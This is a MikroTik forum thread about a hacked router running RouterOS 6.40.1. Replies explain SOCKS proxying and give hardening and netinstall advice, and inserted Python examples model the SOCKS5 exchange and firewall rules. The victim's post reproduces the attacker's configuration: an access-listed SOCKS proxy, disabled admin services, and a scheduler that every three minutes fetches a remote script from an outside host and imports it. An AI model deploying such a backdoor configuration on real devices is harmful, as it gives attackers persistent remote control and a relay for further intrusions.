David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 3:42 pm

Hello,
what is IP SOCKS used for?

Someone entered my router last night and added these settings:
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp

/ip service
set ssh  port=26711
set api  disabled=yes
set winbox disabled=yes

/ip socks
set enabled=yes port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add action=deny src-address=0.0.0.0/0

/system scheduler
add interval=3m name=U6 on-event="/tool fetch url=http://zancetom.com/poll/6db\
    69e09-de68-4ca0-a9e7-363827bffb82 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup

and also opened an L2TP client:

connect to : s38.eeongous.com
user: user4939176
password: user4939176
What is the damage of what he did?
Also, what does the IP SOCKS help him with?

Thanks,
 
eworm
Forum Guru
Posts: 1070
Joined: Wed Oct 22, 2014 9:23 am
Location: Oberhausen, Germany

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 3:58 pm

 
normis
MikroTik Support
Posts: 26322
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 4:07 pm

David1234, there could be other things set up, better do a clean reinstall of this system.
 
David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 4:32 pm

I have reinstalled to avoid problems,

but I want to understand what SOCKS does.
Can you explain in simple words?
Also, what does he gain from adding this?
 
Sob
Forum Guru
Posts: 9119
Joined: Mon Apr 20, 2009 9:11 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 5:52 pm

It's a proxy server, similar to a web proxy. They can use it to hide behind your router when they try to hack other devices. They will send a request to the proxy server on your router, it will send it to the target, and the target will think that it's you hacking them.
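Added example (mine, not from the thread): the exchange Sob describes, in Python, with both sides' messages. The client builds a CONNECT request naming the real target; the proxy parses it, applies an `/ip socks access`-style first-match list to the client's source address, and answers with the RFC 1928 reply. The access list, the attacker's source and the target address are constructed (RFC 5737 documentation ranges stand in for the next victim). Which SOCKS version a given RouterOS build speaks is not discussed in the thread; this uses the SOCKS5 wire format because it carries hostnames as well as IPv4 literals. That an unmatched source is allowed by default is an assumption suggested by the attacker closing the list with an explicit deny-all.

```python
import ipaddress
import socket
import struct
from typing import Dict, List, Tuple

# SOCKS5 constants (RFC 1928): version, "no authentication", CONNECT command,
# address types and two reply codes.
VER, NO_AUTH, CMD_CONNECT = 0x05, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REP_OK, REP_NOT_ALLOWED = 0x00, 0x02


def client_greeting() -> bytes:
    """VER, NMETHODS, METHODS: the client offers only 'no authentication'."""
    return bytes([VER, 1, NO_AUTH])


def client_connect(host: str, port: int) -> bytes:
    """CONNECT request naming the real destination. The proxy, not the
    client, will open the TCP session to it."""
    try:
        body = bytes([ATYP_IPV4]) + socket.inet_aton(host)   # dotted IPv4 literal
    except OSError:
        name = host.encode("idna")                           # otherwise a hostname
        body = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([VER, CMD_CONNECT, 0x00]) + body + struct.pack("!H", port)


def parse_connect(req: bytes) -> Tuple[str, int]:
    """Proxy side: recover where the client wants us to connect."""
    if len(req) < 4 or req[0] != VER or req[1] != CMD_CONNECT:
        raise ValueError("not a SOCKS5 CONNECT")
    atyp = req[3]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(req[4:8]), req[8:]
    elif atyp == ATYP_DOMAIN:
        n = req[4]
        host, rest = req[5:5 + n].decode("idna"), req[5 + n:]
    else:
        raise ValueError("address type not handled in this example")
    if len(rest) != 2:
        raise ValueError("malformed request")
    return host, struct.unpack("!H", rest)[0]


def server_reply(rep: int, bind_ip: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """VER, REP, RSV, ATYP, BND.ADDR, BND.PORT."""
    return bytes([VER, rep, 0x00, ATYP_IPV4]) + socket.inet_aton(bind_ip) + struct.pack("!H", bind_port)


def proxy_decide(src_ip: str, access: List[Tuple[str, str]], req: bytes) -> Tuple[int, Tuple[str, int]]:
    """Apply an /ip socks access-style list (first match wins) to the client's
    source address, then act on the request. Assumption: no match means allow,
    which is why the attacker ended the list with an explicit deny-all."""
    dst = parse_connect(req)
    src = ipaddress.ip_address(src_ip)
    for net, action in access:
        if src in ipaddress.ip_network(net, strict=False):
            return (REP_OK if action == "allow" else REP_NOT_ALLOWED), dst
    return REP_OK, dst


def demo() -> Dict[str, object]:
    # Access list modelled on the post's: two of the attacker's entries, the
    # LAN, then deny-all. Source and target addresses are RFC 5737 test IPs.
    access = [("77.238.240.0/24", "allow"), ("31.172.128.45", "allow"),
              ("10.0.0.0/8", "allow"), ("0.0.0.0/0", "deny")]
    req = client_connect("203.0.113.7", 22)          # the next victim's SSH port
    rep_listed, dst = proxy_decide("31.172.128.45", access, req)
    rep_other, _ = proxy_decide("198.51.100.9", access, req)
    return {"greeting": client_greeting().hex(), "request": req.hex(),
            "destination": dst, "reply_to_listed_ip": rep_listed,
            "reply_to_other_ip": rep_other, "reply_bytes": server_reply(rep_listed).hex()}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The victim only ever sees a TCP connection from the router's own address; the CONNECT request, which names the attacker's real destination, is consumed by the proxy and never reaches the target. That is also why the access list was filled with the attacker's own source networks and closed with deny-all: the proxy was reserved for them, not left open for anyone to find.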
 
pe1chl
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 6:25 pm

Note that the hack is likely an indication of a bad firewall on your router.
After you have re-installed it make sure you configure the firewall properly.
 
Sob
Forum Guru
Posts: 9119
Joined: Mon Apr 20, 2009 9:11 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 6:43 pm

Even if there was no firewall at all, the router can't get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That's nothing against a firewall; it's of course a good idea to have one.
 
pe1chl
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: What is IP SOCKS ? I got hacked and they open this

Thu Jan 28, 2021 9:15 pm

> Even if there was no firewall at all, the router can't get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That's nothing against a firewall; it's of course a good idea to have one.

He was likely running an old version of RouterOS which has a known vulnerability that allows remote attackers to log in to the router no matter what the password is.
(indeed, there was something really wrong with RouterOS)

Of course we do not know if there still are such issues, so it is recommended to not allow incoming connections to the router from the internet unless absolutely necessary.
(that means that you could enable incoming connections to a VPN service, but never to the admin interfaces like ssh, telnet, winbox, webfig. When you require remote admin, you use a VPN)
 
Van9018
Long time Member
Posts: 558
Joined: Mon Jun 16, 2014 6:26 pm
Location: Canada - Abbotsford

Re: What is IP SOCKS ? I got hacked and they open this

Fri Jan 29, 2021 4:51 am

And set a password for winbox. I left it as just admin and someone's personal laptop set up a PPTP service on the Mikrotik along with vpn/vpn as the user/pass for the VPN.
Consider firewalling your winbox on the LAN side.
 
David1234
Forum Guru
Topic Author
Posts: 1424
Joined: Sun Sep 18, 2011 7:00 pm

Re: What is IP SOCKS ? I got hacked and they open this

Sun Jan 31, 2021 9:23 am

> > Even if there was no firewall at all, the router can't get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That's nothing against a firewall; it's of course a good idea to have one.
>
> He was likely running an old version of RouterOS which has a known vulnerability that allows remote attackers to log in to the router no matter what the password is.
> (indeed, there was something really wrong with RouterOS)
>
> Of course we do not know if there still are such issues, so it is recommended to not allow incoming connections to the router from the internet unless absolutely necessary.
> (that means that you could enable incoming connections to a VPN service, but never to the admin interfaces like ssh, telnet, winbox, webfig. When you require remote admin, you use a VPN)

You are right.
The RouterOS version is 6.40.1, is it a problem?
I have many routers with this version (~50).

The password is not so easy (10 chars + 4 numbers, no logic behind them, very very random ;-) )

Will this help with blocking? That way I allow only known (my own) networks to enter the router:
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes

Also, can someone please show me a simple example of what IP SOCKS does?
I understand it allows traffic between the router and an external server.
I never heard about this before, so if someone uses it, can he show me a simple example and use case for it?

Thanks ,
 
pe1chl
Forum Guru
Posts: 10195
Joined: Mon Jun 08, 2015 12:09 pm

Re: What is IP SOCKS ? I got hacked and they open this

Sun Jan 31, 2021 12:18 pm

> The RouterOS version is 6.40.1, is it a problem?
> I have many routers with this version (~50).

YES it is a BIG problem! With that version, people can walk in regardless of the complexity of your password.
You should update ASAP, and keep a bit more up to date in the future.
However, I would not recommend updating to 6.48 (or any 6.xx version, i.e. without extra .1 or higher), so for now it is best to upgrade to the long-term version.
(currently 6.46.8)

> The password is not so easy (10 chars + 4 numbers, no logic behind them, very very random ;-) )

That does not matter, because in that version the attacker can download your password file before login and it contains your passwords in plaintext.

> Will this help with blocking? That way I allow only known (my own) networks to enter the router:
> /ip service
> set telnet disabled=yes
> set ftp address=10.0.0.0/24,172.16.0.0/16
> set www address=10.0.0.0/24 disabled=yes
> set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
> set api address=10.0.0.0/24,172.16.0.0/16
> set winbox address=10.0.0.0/24,172.16.0.0/16
> set api-ssl disabled=yes

I think it helps against this vulnerability but I am not sure. I always add firewall rules to disallow access to the router from the internet as well.

> Also, can someone please show me a simple example of what IP SOCKS does?

They now have established this site https://google.com/ where you can easily find answers to such generic questions... maybe sometime you should try it!
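Added example (mine, not from either poster) for the `/ip service address=` question above and pe1chl's reply: a Python model of whether a management service can be reached from a given source address, checking the input chain first (first match wins, as on RouterOS) and then the service's own address list. The `/ip service` block is the one proposed in the question; the five input-chain rules are a constructed stand-in for the firewall pe1chl recommends, with IPsec (udp 500/4500) as the one service admitted from anywhere. The model only understands address, protocol, port and connection-state matchers; interface-based rules such as `in-interface-list=WAN` are not modelled, and it says nothing about whether the address list stops the vulnerability pe1chl refers to.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

_TOKEN = re.compile(r'([\w-]+)=("[^"]*"|\S+)')
# RouterOS default ports for the services under /ip service
DEFAULT_PORTS = {"telnet": 23, "ftp": 21, "www": 80, "ssh": 22, "www-ssl": 443,
                 "api": 8728, "api-ssl": 8729, "winbox": 8291}

# Constructed sample: the /ip service block from the question, preceded by a
# short input chain of the kind pe1chl recommends (my own rules, not his).
HARDENED = """
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input src-address=10.0.0.0/24
add action=accept chain=input src-address=172.16.0.0/16
add action=accept chain=input dst-port=500,4500 protocol=udp comment="IPsec IKE/NAT-T from anywhere"
add action=drop chain=input
/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes
"""
# The question's own case: the same /ip service lines with no input chain at all.
SERVICES_ONLY = HARDENED[HARDENED.index("/ip service"):]


def parse(text: str) -> Tuple[List[Dict[str, str]], Dict[str, Dict[str, str]]]:
    """Split an export into firewall filter rules and per-service settings."""
    rules: List[Dict[str, str]] = []
    services: Dict[str, Dict[str, str]] = {}
    section = ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("/"):
            section = line
        elif section == "/ip firewall filter" and line.startswith("add "):
            rules.append({k: v.strip('"') for k, v in _TOKEN.findall(line)})
        elif section == "/ip service" and line.startswith("set "):
            services[line.split()[1]] = dict(_TOKEN.findall(line))
    return rules, services


def _port_in(spec: str, port: int) -> bool:
    """dst-port accepts a comma list of ports and ranges, e.g. 500,4500 or 8291-8299."""
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False


def _rule_matches(rule: Dict[str, str], src: ipaddress.IPv4Address, proto: str, port: int) -> bool:
    """Does this rule match the first packet of a new inbound connection?"""
    if rule.get("chain") != "input":
        return False
    if "new" not in rule.get("connection-state", "new").split(","):
        return False            # established/related rules never see a first packet
    if "src-address" in rule and src not in ipaddress.ip_network(rule["src-address"], strict=False):
        return False
    if "protocol" in rule and rule["protocol"] != proto:
        return False
    if "dst-port" in rule and not _port_in(rule["dst-port"], port):
        return False
    return True


def service_reachable(config: str, src_ip: str, service: str) -> Tuple[bool, str]:
    """Walk the input chain (first match wins), then the service's address list."""
    rules, services = parse(config)
    svc = services.get(service, {})
    if svc.get("disabled") == "yes":
        return False, f"{service} is disabled"
    port = int(svc.get("port", DEFAULT_PORTS[service]))
    src = ipaddress.ip_address(src_ip)
    for i, rule in enumerate(rules, 1):
        if _rule_matches(rule, src, "tcp", port):
            if rule.get("action") != "accept":
                return False, f"tcp/{port} dropped by input rule {i}"
            break               # accepted by the firewall; the service still gets its say
    if "address" in svc:
        allowed = [ipaddress.ip_network(a, strict=False) for a in svc["address"].split(",")]
        if not any(src in n for n in allowed):
            return False, f"tcp/{port} reaches the service but its address list rejects {src_ip}"
    return True, f"{service} reachable on tcp/{port}"


if __name__ == "__main__":
    for cfg, label in ((SERVICES_ONLY, "service list only"), (HARDENED, "service list + input chain")):
        for src in ("198.51.100.9", "10.0.0.5", "10.0.1.7"):
            print(f"{label:28} {src:>13} -> {service_reachable(cfg, src, 'winbox')[1]}")
```

The two layers fail differently: with only the address list, a packet from the internet is still delivered to the service process, which then decides to refuse it; with the input chain in front, the packet is dropped before any service code runs, which is the property pe1chl is after. Note also that the proposed list admits only 10.0.0.0/24, so a host on 10.0.1.x (the third sample source) is locked out as firmly as the internet is.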
 
alucionet
just joined
Posts: 8
Joined: Fri Feb 26, 2010 4:18 am

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 4:32 pm

I am seeing the same thing on multiple routers on my network.
Has anybody figured out what's going on?
It has strangely been able to get on other routers within my network, enables IP socks and disables winbox port.
So far, no other harm found.
 
tdw
Forum Guru
Posts: 1843
Joined: Sat May 05, 2018 11:55 am

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 4:51 pm

Yes, there were some well publicised vulnerabilities allowing remote unauthenticated access on devices which did not have firewall rules to restrict remote administrative access. It is good practice to only allow remote administrative access from a few known IP addresses, or better still via a VPN connection.

If some of your devices have been compromised, the only reliable way to clean them is to use netinstall, which completely erases the Mikrotik memory, and reconfigure from an export (.rsc file), NOT a backup (.backup file). Persistent changes can be made which are not visible through Winbox/Webfig/CLI, so cannot be removed, and are included in backups.
 
mada3k
Long time Member
Posts: 687
Joined: Mon Jul 13, 2015 10:53 am
Location: Sweden

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 5:11 pm

6.40.1 is ancient. And never ever leave winbox or any other services open to Internet.
 
anav
Forum Guru
Posts: 19107
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: What is IP SOCKS ? I got hacked and they open this

Fri Mar 05, 2021 5:41 pm

Not only is it ancient, but it's negligent not to have updated them.
If you have over 50 devices you must be an installer and have some sort of maintenance responsibility.
After you kick yourself in the arse, I suggest you need to netinstall all 50 of those devices.
